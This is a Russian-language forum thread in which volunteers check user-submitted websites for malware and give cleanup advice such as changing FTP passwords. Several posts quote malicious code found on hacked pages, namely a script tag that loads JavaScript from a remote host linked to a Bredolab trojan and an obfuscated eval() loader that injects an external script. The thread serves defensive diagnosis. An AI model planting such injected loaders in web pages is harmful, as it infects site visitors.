Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,319
Баллы
2,203
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,319
Баллы
2,203
проверьте пож. хттп://goe.ucoz.ua/ - при открытии только АВАСТ ругается что там вирус...
Пока ничего явно зловредного не вижу.

Добавлено через 56 минут 11 секунд
winset19, в конце страницы

PHP:
</html><script type="text/javascript" src="http://pantscow.ru:****byte.js"></script>
Добавлено через 10 минут 35 секунд
http://safebrowsing.clients.google....irefox&hl=en-GB&site=http://pantscow.ru:8080/

Пока удалось поймать только Trojan.Win32.Jorik.Bredolab.cj
 

Arbitr

Ассоциация VN
VIP
Сообщения
3,619
Реакции
1,633
Баллы
593
проверьте плиз kolyan.net Drongo сказал что получил с него заражение после моей ссылки на него, так же вечером я нашел зверей на своем компе
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,319
Баллы
2,203
Arbitr, пока ничего не вижу. Понаблюдаю.
 

winset19

Активный пользователь
Сообщения
4
Реакции
0
Баллы
391
winset19, в конце страницы

PHP:
</html><script type="text/javascript" src="http://pantscow.ru:****byte.js"></script>
Добавлено через 10 минут 35 секунд
http://safebrowsing.clients.google....irefox&hl=en-GB&site=http://pantscow.ru:8080/

Пока удалось поймать только Trojan.Win32.Jorik.Bredolab.cj

спасибо что ответил ) теперь хотелось бы узнать как его вылечить а то после атаки на комп на всех моих сайтах появилась эта фигня (
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,319
Баллы
2,203
теперь хотелось бы узнать как его вылечить а то после атаки на комп на всех моих сайтах появилась эта фигня
1. Необходимо провести лечение компьютера
2. Удалить вредоносный код с страницы (зависит от движка сайта). Начните с проверки файлов на FTP возможно они изменены злоумышленниками.
3. Обязательно сменить пароли на FTP и БД (если используете).
 

winset19

Активный пользователь
Сообщения
4
Реакции
0
Баллы
391
спасибо )
код нашел в index.php пароли изменил ) если нетрудно то проверь еще раз буду очень признателен!
хттп://moihousse.tk
и еще вот этот
хттп://chromset.ucoz.ru
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,319
Баллы
2,203
winset19, вечером когда будет доступ до тестовой машины.
 

juriy

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
Проверьте, пожалуйта, хттп://ввв.parfumaniya.com.ua/forum/

Яндекс пишет, что есть вирус на сайте :(
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,319
Баллы
2,203
winset19, не вижу признаков заражения.

Добавлено через 43 минуты 5 секунд
Проверьте, пожалуйта, хттп://ввв.parfumaniya.com.ua/forum/
Яндекс пишет, что есть вирус на сайте

Сейчас активно ничего систему не атакует, но мне не нравится этот скрипт

PHP:
<script type='text/javascript' language='javascript'>
<!--
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c*******'\\b'+e(c)+'\\b','g'),k[c])}}return p}('2=\'b://9\'+\'.\'+\'d\'+\'s\'+\'e\'+\'a.8/s/g/?4=5\';7.6("<f"+"0 m"+"h"+"o=\'p"+"q"+"3\' 1"+"r=\'1"+"n/i"+"k"+"0\' l"+"c=\'"+2+"\'></j"+"3>");',29,29,'ript|t|K406|ipt|sid|113673|write|document|net|juriy||http||oko|hechk|sc|puiFq8693|ngua|jav|scr|asc|sr|la|ext|ge|ja|vascr|ype|'.split('|'),0,{}))
// -->
</script>
В конце цепочки сидит
http://juriy.okoshechka.net/***I3621/?sid=113673&seed=68135797

Данные на том сайте мне сейчас недоступны.

Это вы устанавливали этот код?
 

winset19

Активный пользователь
Сообщения
4
Реакции
0
Баллы
391
спасибо,
вроде на все сайты перезалил движки
а вот с этих все равно при входе каспер пишет мошеничество (
хттп://kompaz.tk
хттп://bazatvorchestva.tk
проверь эти если не трудно, движок вордпресс )
и яндекс повесил на них заражение (

полностью пересоздал сайты, так что можешь не проверять, спасибо за помощь!
 
Последнее редактирование:

juriy

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
winset19, не вижу признаков заражения.

Добавлено через 43 минуты 5 секунд



Сейчас активно ничего систему не атакует, но мне не нравится этот скрипт

PHP:
<script type='text/javascript' language='javascript'>
<!--
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c*******'\\b'+e(c)+'\\b','g'),k[c])}}return p}('2=\'b://9\'+\'.\'+\'d\'+\'s\'+\'e\'+\'a.8/s/g/?4=5\';7.6("<f"+"0 m"+"h"+"o=\'p"+"q"+"3\' 1"+"r=\'1"+"n/i"+"k"+"0\' l"+"c=\'"+2+"\'></j"+"3>");',29,29,'ript|t|K406|ipt|sid|113673|write|document|net|juriy||http||oko|hechk|sc|puiFq8693|ngua|jav|scr|asc|sr|la|ext|ge|ja|vascr|ype|'.split('|'),0,{}))
// -->
</script>
В конце цепочки сидит
http://juriy.okoshechka.net/***I3621/?sid=113673&seed=68135797

Данные на том сайте мне сейчас недоступны.

Это вы устанавливали этот код?


это код тизерной сети. убрал, спасибо
 

Оля1990

Активный пользователь
Сообщения
5
Реакции
1
Баллы
393
Проверьте, пожалуйста, сайт hттp://himikell-4it.clan.su. У моего брата он постоянно с включением браузера запускался, а теперь когда включаешь браузер, аваст и anti-malware сразу все блокируют. Друзья брата, которые держат этот сайт, говорят, что там ниче нет.
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,319
Баллы
2,203
Оля1990, я не вижу признаков взлома.
 

Arbitr

Ассоциация VN
VIP
Сообщения
3,619
Реакции
1,633
Баллы
593
хттпp://pro-doctor.net/ проверьте плиз
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,319
Баллы
2,203
Arbitr, обычные мошенники.
 

sergynhik

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
хттп://peskomment.ru/ прошу проверить главную страницу, постоянно лезет вирус, все обыскал нет вирусов, и онлайн вирусники тоже пишут нет вирусов.

Зарание спасибо..
 

Doktor

Активный пользователь
Сообщения
5
Реакции
0
Баллы
393
Avira в офисе палит вот этот сайт хттп://rabota118.nxt.ru/
 

Doktor

Активный пользователь
Сообщения
5
Реакции
0
Баллы
393
Спасибо :)
Что-то сообщение не могу отредактировать,только добавить...
 

akok

Команда форума
Администратор
Сообщения
19,281
Реакции
13,319
Баллы
2,203
хттп://peskomment.ru/ прошу проверить главную страницу, постоянно лезет вирус, все обыскал нет вирусов, и онлайн вирусники тоже пишут нет вирусов.
Зарание спасибо..

Ничего не вижу. Нужны скриншоты и больше информации.
 
Сверху Снизу